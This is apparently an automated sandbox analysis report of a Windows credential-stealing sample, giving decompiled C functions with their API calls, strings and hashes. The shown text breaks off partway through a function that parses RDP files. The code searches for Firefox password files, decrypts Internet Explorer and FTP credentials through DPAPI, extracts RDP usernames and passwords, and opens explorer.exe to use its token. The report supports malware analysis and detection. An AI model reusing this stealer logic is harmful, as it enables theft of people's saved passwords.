                                                                        • Instruction ID: 6fbac20c93ee8dcf72c2f2e582e4e5176c4e840c565eb3d7ca7bd60efa235b74
                                                                        • Opcode Fuzzy Hash: fb9b7f913ff500385d027358800d845580eb72bb67fe42432893e3097370cae2
                                                                        • Instruction Fuzzy Hash: 86C09B7210460856C7155F65C98579A79D85B103CCF5081357905555B1D6B8D5D0C5DC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004017EC(intOrPtr _a4) {
                                                                        				void* _t4;
                                                                        
                                                                        				_t4 = LocalAlloc(0x40, _a4 + 0x80); // executed
                                                                        				return _t4;
                                                                        			}





                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocLocal
                                                                        • String ID:
                                                                        • API String ID: 3494564517-0
                                                                        • Opcode ID: c7da79b5d8410c9ad293d4aa48da395a822b013a6b1f115db719f7d1cd44fc81
                                                                        • Instruction ID: c45b4f91a8b266b6492c347f0c6a08b042b0071dba384013e78457423f248dae
                                                                        • Opcode Fuzzy Hash: c7da79b5d8410c9ad293d4aa48da395a822b013a6b1f115db719f7d1cd44fc81
                                                                        • Instruction Fuzzy Hash: 81B092B120030826E240E789C803F5A728C9B14B8CF008221BB44A6282D8ACF89045AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 93%
                                                                        			E00409484(signed int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16) {
                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                        				void* _v328;
                                                                        				CHAR* _v332;
                                                                        				char* _v336;
                                                                        				char* _t52;
                                                                        				signed int _t54;
                                                                        				CHAR* _t56;
                                                                        				void* _t60;
                                                                        				char* _t63;
                                                                        				int _t65;
                                                                        				char* _t68;
                                                                        				int _t75;
                                                                        				int _t77;
                                                                        				int _t80;
                                                                        				signed int _t82;
                                                                        				void* _t84;
                                                                        				char* _t93;
                                                                        				signed int _t99;
                                                                        				signed int* _t100;
                                                                        				signed int _t101;
                                                                        
                                                                        				_t99 = __ecx;
                                                                        				_v332 = 0;
                                                                        				_t52 = _a16;
                                                                        				if(_t52 == 0 ||  *_t52 == 0) {
                                                                        					L31:
                                                                        					return E004017D5(_v332);
                                                                        				} else {
                                                                        					_t54 = E004024D7(_a16);
                                                                        					__eflags = _t54;
                                                                        					if(_t54 != 0) {
                                                                        						_t56 = E00401D15(_a16, "*.*");
                                                                        					} else {
                                                                        						_t56 = E00401D15(_a16, "\\*.*");
                                                                        					}
                                                                        					_v332 = _t56;
                                                                        					E00401803( &_v324, 0x13e);
                                                                        					_t60 = FindFirstFileA(_v332,  &_v324);
                                                                        					_v328 = _t60;
                                                                        					__eflags = _t60 + 1;
                                                                        					if(_t60 + 1 != 0) {
                                                                        						do {
                                                                        							_t100 =  &_v324;
                                                                        							__eflags =  *_t100 & 0x00000010;
                                                                        							if(( *_t100 & 0x00000010) == 0) {
                                                                        								_v336 =  &(_t100[0xb]);
                                                                        								__eflags =  *0x415824 - 3;
                                                                        								if( *0x415824 != 3) {
                                                                        									_t63 = StrStrIA(_v336, "signons.sqlite");
                                                                        									__eflags = _t63;
                                                                        									if(_t63 != 0) {
                                                                        										E004090A3(__eflags, _a4, E00401D69(E00401D15(_a16, "\\"), _v336), _a8, _a12);
                                                                        										E004017D5(_t90);
                                                                        									}
                                                                        									_t65 = lstrlenA(_v336);
                                                                        									__eflags = _t65 - 2;
                                                                        									if(_t65 < 2) {
                                                                        										L25:
                                                                        										_push(StrStrIA(_v336, "signons.txt"));
                                                                        										_push(StrStrIA(_v336, "signons2.txt"));
                                                                        										_t68 = StrStrIA(_v336, "signons3.txt");
                                                                        										_pop(_t101);
                                                                        										_pop(_t99);
                                                                        										__eflags = _t68;
                                                                        										if(_t68 != 0) {
                                                                        											goto L28;
                                                                        										}
                                                                        										__eflags = _t101;
                                                                        										if(_t101 != 0) {
                                                                        											goto L28;
                                                                        										}
                                                                        										_t99 = _t99;
                                                                        										__eflags = _t99;
                                                                        										if(_t99 == 0) {
                                                                        											goto L29;
                                                                        										}
                                                                        										goto L28;
                                                                        									} else {
                                                                        										__eflags =  *((short*)( &(_v336[_t65]) - 2)) - 0x732e;
                                                                        										if( *((short*)( &(_v336[_t65]) - 2)) != 0x732e) {
                                                                        											goto L25;
                                                                        										}
                                                                        										L28:
                                                                        										E0040912E(__eflags, _a4, E00401D69(E00401D15(_a16, "\\"), _v336), _a8, _a12);
                                                                        										E004017D5(_t71);
                                                                        										goto L29;
                                                                        									}
                                                                        								}
                                                                        								_t93 = StrStrIA(_v336, "prefs.js");
                                                                        								__eflags = _t93;
                                                                        								if(_t93 != 0) {
                                                                        									E00403E4C(_a4, E00401D69(E00401D15(_a16, "\\"), _v336), 0xbeef0001);
                                                                        									E004017D5(_t96);
                                                                        								}
                                                                        								goto L29;
                                                                        							}
                                                                        							_t77 = lstrcmpiA(0x414806,  &(_t100[0xb]));
                                                                        							__eflags = _t77;
                                                                        							if(_t77 != 0) {
                                                                        								_t80 = lstrcmpiA(0x414808,  &( &_v324->cFileName));
                                                                        								__eflags = _t80;
                                                                        								if(_t80 != 0) {
                                                                        									_t82 = E004024D7(_a16);
                                                                        									__eflags = _t82;
                                                                        									if(_t82 != 0) {
                                                                        										_t84 = E00401D15(_a16, 0);
                                                                        									} else {
                                                                        										_t84 = E00401D15(_a16, "\\");
                                                                        									}
                                                                        									E00409484(_t99, _a4, _a8, _a12, E00401D69(_t84,  &( &_v324->cFileName)));
                                                                        									E004017D5(_t85);
                                                                        								}
                                                                        							}
                                                                        							L29:
                                                                        							_t75 = FindNextFileA(_v328,  &_v324);
                                                                        							__eflags = _t75;
                                                                        						} while (_t75 != 0);
                                                                        						FindClose(_v328);
                                                                        					}
                                                                        					goto L31;
                                                                        				}
                                                                        			}
























                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 004094F4
                                                                        • lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00409521
                                                                        • lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 0040953E
                                                                        • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,?,004140DA,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite), ref: 004096D4
                                                                        • FindClose.KERNEL32(?,?,?,00000000,00000000,?,?,004140DA,00000000,?,signons2.txt,00000000,?,signons.txt,?,?), ref: 004096E7
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                        • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                                        • API String ID: 3040542784-1405255088
                                                                        • Opcode ID: a56a53706eb00f5ef4618a8b98f3ad676a585cd1c48dc3f9a5d8324fea737ce5
                                                                        • Instruction ID: b663840663784a3fe1e581d68bb3c28c37a014c69344c9f8a2cf847aa5b90957
                                                                        • Opcode Fuzzy Hash: a56a53706eb00f5ef4618a8b98f3ad676a585cd1c48dc3f9a5d8324fea737ce5
                                                                        • Instruction Fuzzy Hash: 77514F71510109BADF226F62DC02AEE7A79AF54308F1444BBB408B50F2D67E9DE09E5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E0040A1A9(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                        				char _v1028;
                                                                        				char _v2052;
                                                                        				int _v2056;
                                                                        				int _v2060;
                                                                        				intOrPtr _v2064;
                                                                        				char _v2068;
                                                                        				char _v2072;
                                                                        				char _v2076;
                                                                        				void* _v2080;
                                                                        				char _v2084;
                                                                        				void* _v2088;
                                                                        				char _v2092;
                                                                        				intOrPtr _v2096;
                                                                        				void* _t53;
                                                                        				int _t58;
                                                                        
                                                                        				E00409EFB(_a4,  &_v1028, _a20);
                                                                        				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v2052, 0x3ff, 0, 0);
                                                                        				_v2068 = 0x10;
                                                                        				_v2064 = 2;
                                                                        				_v2060 = 0;
                                                                        				_v2056 = 0;
                                                                        				_t53 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v2076,  &_v2072,  &_v2068, 0);
                                                                        				if(_v2076 == 0 || _v2072 == 0) {
                                                                        					return _t53;
                                                                        				}
                                                                        				_v2096 = 0xbeef0000;
                                                                        				if(lstrcmpiA( &_v1028, "Internet Explorer") == 0) {
                                                                        					L5:
                                                                        					_t58 = StrStrIA( &_v2052, "DPAPI: ");
                                                                        					if(_t58 == 0) {
                                                                        						_t58 = E0040A13B(_v2096, _a12, _v2072, _v2076, _a16);
                                                                        					} else {
                                                                        						if( *0x41442d != 0) {
                                                                        							_push(_v2076);
                                                                        							_pop( *_t29);
                                                                        							_push(_v2072);
                                                                        							_pop( *_t31);
                                                                        							_t58 =  *0x41442d( &_v2084, 0, 0, 0, 0, 1,  &_v2092);
                                                                        							if(_t58 != 0) {
                                                                        								E0040A13B(_v2096, _a12, _v2088, _v2092, _a16);
                                                                        								_t58 = LocalFree(_v2088);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L11:
                                                                        					_push(_v2072);
                                                                        					L00410DCA();
                                                                        					return _t58;
                                                                        				}
                                                                        				_v2096 = 0xbeef0001;
                                                                        				if(lstrcmpiA( &_v1028, "WininetCacheCredentials") == 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				_v2096 = 0xbeef0002;
                                                                        				_t58 = lstrcmpiA( &_v1028, "MS IE FTP Passwords");
                                                                        				if(_t58 != 0) {
                                                                        					goto L11;
                                                                        				}
                                                                        				goto L5;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00409EFB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F34
                                                                          • Part of subcall function 00409EFB: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F3D
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A1DD
                                                                        • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A267
                                                                        • lstrcmpiA.KERNEL32(?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A286
                                                                        • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords,?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A2A5
                                                                        • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A2BE
                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A304
                                                                        • LocalFree.KERNEL32(?), ref: 0040A331
                                                                        • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A35B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
                                                                        • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                                                        • API String ID: 2957877119-3076635702
                                                                        • Opcode ID: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
                                                                        • Instruction ID: d0109d7229b507364c02bffd69db74d2b73ca55b941890eea464c4d2f255e551
                                                                        • Opcode Fuzzy Hash: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
                                                                        • Instruction Fuzzy Hash: CE415E7240021DEADF219F50CC42FDA77B9BF08304F0480E6B64475190DB759AE58FD9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E0040BA2E(void* __eax, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                                                                        				int _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				int _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				int _v32;
                                                                        				char _v36;
                                                                        				void* _v40;
                                                                        				void* _v44;
                                                                        				char _v48;
                                                                        				void* _v52;
                                                                        				int _v56;
                                                                        				char* _v60;
                                                                        				void* _t55;
                                                                        				void* _t56;
                                                                        				int _t77;
                                                                        				int _t78;
                                                                        
                                                                        				_t55 = __eax;
                                                                        				if(_a16 == 0 ||  *0x41442d == 0) {
                                                                        					return _t55;
                                                                        				} else {
                                                                        					_t56 = _a16;
                                                                        					__eflags =  *0x41914c - _t56; // 0x0
                                                                        					if(__eflags < 0) {
                                                                        						__eflags =  *0x419150 - _t56; // 0x5
                                                                        						if(__eflags < 0) {
                                                                        							__eflags =  *0x419154 - _t56; // 0x3
                                                                        							if(__eflags < 0) {
                                                                        								E0040B1AB(_a12,  *0x41914c,  &_v8,  &_v12,  &_v16);
                                                                        								E0040B1AB(_a12,  *0x419154,  &_v20,  &_v24,  &_v28);
                                                                        								E0040B1AB(_a12,  *0x419150,  &_v32,  &_v36,  &_v40);
                                                                        								_push(_v32);
                                                                        								_pop( *_t16);
                                                                        								_push(_v40);
                                                                        								_pop( *_t18);
                                                                        								_v52 = 0;
                                                                        								_t56 =  *0x41442d( &_v48, 0, 0, 0, 0, 1,  &_v56);
                                                                        								__eflags = _t56;
                                                                        								if(_t56 != 0) {
                                                                        									__eflags = _v52;
                                                                        									if(_v52 != 0) {
                                                                        										__eflags = _v56 - _v32;
                                                                        										if(_v56 <= _v32) {
                                                                        											asm("cld");
                                                                        											asm("jecxz 0x4");
                                                                        											memcpy(_v40, _v52, _v56);
                                                                        											_push(_v56);
                                                                        											_pop( *_t29);
                                                                        											_t56 = LocalFree(_v52);
                                                                        											__eflags = _v8;
                                                                        											if(_v8 != 0) {
                                                                        												__eflags = _v20;
                                                                        												if(_v20 != 0) {
                                                                        													__eflags = _v32;
                                                                        													if(_v32 != 0) {
                                                                        														_v60 = E004017EC(_v8);
                                                                        														E00401823(_v16, _v60, _v8);
                                                                        														_t77 = StrCmpNIA(_v60, "ftp://", lstrlenA("ftp://"));
                                                                        														__eflags = _t77;
                                                                        														if(_t77 != 0) {
                                                                        															_t77 = StrCmpNIA(_v60, "http://", lstrlenA("http://"));
                                                                        														}
                                                                        														_t78 = _t77;
                                                                        														__eflags = _t78;
                                                                        														if(_t78 != 0) {
                                                                        															_t78 = StrCmpNIA(_v60, "https://", lstrlenA("https://"));
                                                                        														}
                                                                        														__eflags = _t78;
                                                                        														if(_t78 == 0) {
                                                                        															E00401486(_a8, _a20);
                                                                        															E00401486(_a8,  *0x419148);
                                                                        															E004014BC(_a8, _v16, _v8);
                                                                        															E004014BC(_a8, _v28, _v20);
                                                                        															E004014BC(_a8, _v40, _v32);
                                                                        														}
                                                                        														return E004017D5(_v60);
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t56;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BAE5
                                                                        • LocalFree.KERNEL32(00000000,?), ref: 0040BB20
                                                                        • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB61
                                                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB6F
                                                                        • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB7D
                                                                        • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB8B
                                                                        • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB99
                                                                        • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$CryptDataFreeLocalUnprotect
                                                                        • String ID: ftp://$http://$https://
                                                                        • API String ID: 3968356742-2804853444
                                                                        • Opcode ID: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
                                                                        • Instruction ID: bf0502dff25623896b3ecf7b6da0d74d92ec6f4b9260b97e51de09929ef1935b
                                                                        • Opcode Fuzzy Hash: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
                                                                        • Instruction Fuzzy Hash: 9E51E772900209FBDF12AF91ED45EEE7B7AEB48314F108136F510B11A1D7799A90EB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 38%
                                                                        			E00402C05(void* __eax, void* __edx, intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				intOrPtr _v16;
                                                                        				char _v276;
                                                                        				long _v304;
                                                                        				void* _v312;
                                                                        				void* _v316;
                                                                        				int _v320;
                                                                        				int _v324;
                                                                        				void* _t33;
                                                                        				int _t36;
                                                                        				void* _t44;
                                                                        				void* _t47;
                                                                        				int* _t56;
                                                                        				void* _t60;
                                                                        				int _t64;
                                                                        
                                                                        				if( *0x4143d1 == 0 ||  *0x4143d5 == 0 ||  *0x41440d == 0 ||  *0x414411 == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t60 = 0;
                                                                        					_v16 =  *0x4143d1();
                                                                        					_v312 = 0x128;
                                                                        					_t33 = CreateToolhelp32Snapshot(2, 0);
                                                                        					if(_t33 != 0xffffffff) {
                                                                        						_v316 = _t33;
                                                                        						_t36 = Process32First(_v316,  &_v312);
                                                                        						while(_t36 != 0) {
                                                                        							if(StrStrIA( &_v276, "explorer.exe") == 0) {
                                                                        								L23:
                                                                        								_t36 = Process32Next(_v316,  &_v312);
                                                                        								continue;
                                                                        							} else {
                                                                        								_v320 = 0;
                                                                        								_t44 =  *0x4143d5(_v304,  &_v320);
                                                                        								_t64 = _v320;
                                                                        								if(_t44 == 0 || _t64 != _v16) {
                                                                        									goto L23;
                                                                        								} else {
                                                                        									_t47 = OpenProcess(0x2000000, 0, _v304);
                                                                        									if(_t47 == 0) {
                                                                        										goto L23;
                                                                        									} else {
                                                                        										_v12 = _t47;
                                                                        										_push( &_v8);
                                                                        										_push(0x201eb);
                                                                        										_push(_v12);
                                                                        										if( *0x41440d() == 0) {
                                                                        											CloseHandle(_v12);
                                                                        											goto L23;
                                                                        										} else {
                                                                        											_push(_v8);
                                                                        											if( *0x414411() == 0) {
                                                                        												CloseHandle(_v8);
                                                                        												CloseHandle(_v12);
                                                                        												goto L23;
                                                                        											} else {
                                                                        												_t60 = _t60 + 1;
                                                                        												_v324 = 0;
                                                                        												_t56 =  &_v324;
                                                                        												_push(_t56);
                                                                        												_push(0xf003f);
                                                                        												L00410E12();
                                                                        												if(_t56 == 0 && _v324 != 0) {
                                                                        													_push(_v324);
                                                                        													_pop( *0x4140fe);
                                                                        												}
                                                                        												if(_a4 != 0) {
                                                                        													_push(_v8);
                                                                        													_pop( *__eax);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						CloseHandle(_v316);
                                                                        					}
                                                                        					return _t60;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00402C59
                                                                        • Process32First.KERNEL32 ref: 00402C7A
                                                                        • StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
                                                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
                                                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
                                                                        • CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Open$CloseCreateCurrentFirstHandleProcessProcess32SnapshotToolhelp32User
                                                                        • String ID: explorer.exe
                                                                        • API String ID: 2079391467-3187896405
                                                                        • Opcode ID: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
                                                                        • Instruction ID: ccbd0d7988a87a0baa37139996db17261bf584517116b24148bb5ef45f8ddf5c
                                                                        • Opcode Fuzzy Hash: d7b33712bffa344649a6c7b91db19c6665e4b5ef021c38cbfc5ccfe492207028
                                                                        • Instruction Fuzzy Hash: 15418B72900218ABDF219F61DD4ABDE7AB5AF04304F0085B6A104B51E1EBFC9ED1DE58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00408789(void* __ecx, intOrPtr _a4, char* _a8, char* _a12) {
                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                        				void* _v328;
                                                                        				CHAR* _v332;
                                                                        				char* _v336;
                                                                        				char* _t36;
                                                                        				signed int _t38;
                                                                        				CHAR* _t40;
                                                                        				void* _t44;
                                                                        				char* _t47;
                                                                        				int _t50;
                                                                        				int _t52;
                                                                        				int _t55;
                                                                        				signed int _t57;
                                                                        				void* _t59;
                                                                        				void* _t68;
                                                                        				signed int* _t69;
                                                                        
                                                                        				_t68 = __ecx;
                                                                        				_v332 = 0;
                                                                        				_t36 = _a8;
                                                                        				if(_t36 == 0 ||  *_t36 == 0) {
                                                                        					L20:
                                                                        					return E004017D5(_v332);
                                                                        				} else {
                                                                        					_t38 = E004024D7(_a8);
                                                                        					__eflags = _t38;
                                                                        					if(_t38 != 0) {
                                                                        						_t40 = E00401D15(_a8, "*.*");
                                                                        					} else {
                                                                        						_t40 = E00401D15(_a8, "\*.*");
                                                                        					}
                                                                        					_v332 = _t40;
                                                                        					E00401803( &_v324, 0x13e);
                                                                        					_t44 = FindFirstFileA(_v332,  &_v324);
                                                                        					_v328 = _t44;
                                                                        					__eflags = _t44 + 1;
                                                                        					if(_t44 + 1 != 0) {
                                                                        						do {
                                                                        							_t69 =  &_v324;
                                                                        							__eflags =  *_t69 & 0x00000010;
                                                                        							if(( *_t69 & 0x00000010) == 0) {
                                                                        								_v336 =  &(_t69[0xb]);
                                                                        								_t47 = StrStrIA(_v336, _a12);
                                                                        								__eflags = _t47;
                                                                        								if(_t47 != 0) {
                                                                        									E00408744(_t69, __eflags, _a4, E00401D69(E00401D15(_a8, "\\"), _v336));
                                                                        									E004017D5(_t65);
                                                                        								}
                                                                        							} else {
                                                                        								_t52 = lstrcmpiA(0x414806,  &(_t69[0xb]));
                                                                        								__eflags = _t52;
                                                                        								if(_t52 != 0) {
                                                                        									_t55 = lstrcmpiA(0x414808,  &( &_v324->cFileName));
                                                                        									__eflags = _t55;
                                                                        									if(_t55 != 0) {
                                                                        										_t57 = E004024D7(_a8);
                                                                        										__eflags = _t57;
                                                                        										if(_t57 != 0) {
                                                                        											_t59 = E00401D15(_a8, 0);
                                                                        										} else {
                                                                        											_t59 = E00401D15(_a8, "\\");
                                                                        										}
                                                                        										E00408789(_t68, _a4, E00401D69(_t59,  &( &_v324->cFileName)), _a12);
                                                                        										E004017D5(_t60);
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							_t50 = FindNextFileA(_v328,  &_v324);
                                                                        							__eflags = _t50;
                                                                        						} while (_t50 != 0);
                                                                        						FindClose(_v328);
                                                                        					}
                                                                        					goto L20;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 004087F9
                                                                        • lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00408822
                                                                        • lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 0040883F
                                                                        • FindNextFileA.KERNEL32(?,?,?,?,00000000,?,?,0000013E,?,*.*,?), ref: 004088E6
                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000000,?,?,0000013E,?,*.*,?), ref: 004088F9
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                        • String ID: *.*$\*.*
                                                                        • API String ID: 3040542784-1692270452
                                                                        • Opcode ID: 12ad2d7aacd0b406b1fd84168847851b3bc033d94df53cf634eb985907b76e9d
                                                                        • Instruction ID: 3c8cc9b50cd0f0f031436ee2fa180d1129fc000271da3e07714d4956bd7e6d77
                                                                        • Opcode Fuzzy Hash: 12ad2d7aacd0b406b1fd84168847851b3bc033d94df53cf634eb985907b76e9d
                                                                        • Instruction Fuzzy Hash: 53314072500209AADF21BF62CD02BEE7775AF44314F5480BBB548B60B1DB7C9E909F59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E0040CEA2(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				signed char _v24;
                                                                        				CHAR* _v28;
                                                                        				signed char _v32;
                                                                        				void* _v36;
                                                                        				char _v40;
                                                                        				void* _v44;
                                                                        				char _v48;
                                                                        				signed char _t40;
                                                                        				signed char _t43;
                                                                        				signed char _t51;
                                                                        				signed char _t53;
                                                                        				signed char _t55;
                                                                        				signed char _t59;
                                                                        				signed char _t64;
                                                                        				signed char _t65;
                                                                        				char _t66;
                                                                        
                                                                        				if( *0x41442d != 0) {
                                                                        					_t40 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        					__eflags = _t40;
                                                                        					if(_t40 != 0) {
                                                                        						__eflags = _v8 - 0x100000;
                                                                        						if(_v8 >= 0x100000) {
                                                                        							L23:
                                                                        							return E00401FB0( &_v20);
                                                                        						}
                                                                        						_t43 = E004022C7(_v12, _v8);
                                                                        						__eflags = _t43;
                                                                        						if(_t43 != 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_v24 = E0040CDD0("username:s:", _v12, _v8);
                                                                        						_v28 = E0040CDD0("password 51:b:", _v12, _v8);
                                                                        						_v32 = E0040CDD0("full address:s:", _v12, _v8);
                                                                        						__eflags = _v24;
                                                                        						if(_v24 == 0) {
                                                                        							L22:
                                                                        							E004017D5(_v24);
                                                                        							E004017D5(_v28);
                                                                        							E004017D5(_v32);
                                                                        							goto L23;
                                                                        						}
                                                                        						__eflags = _v28;
                                                                        						if(_v28 == 0) {
                                                                        							goto L22;
                                                                        						}
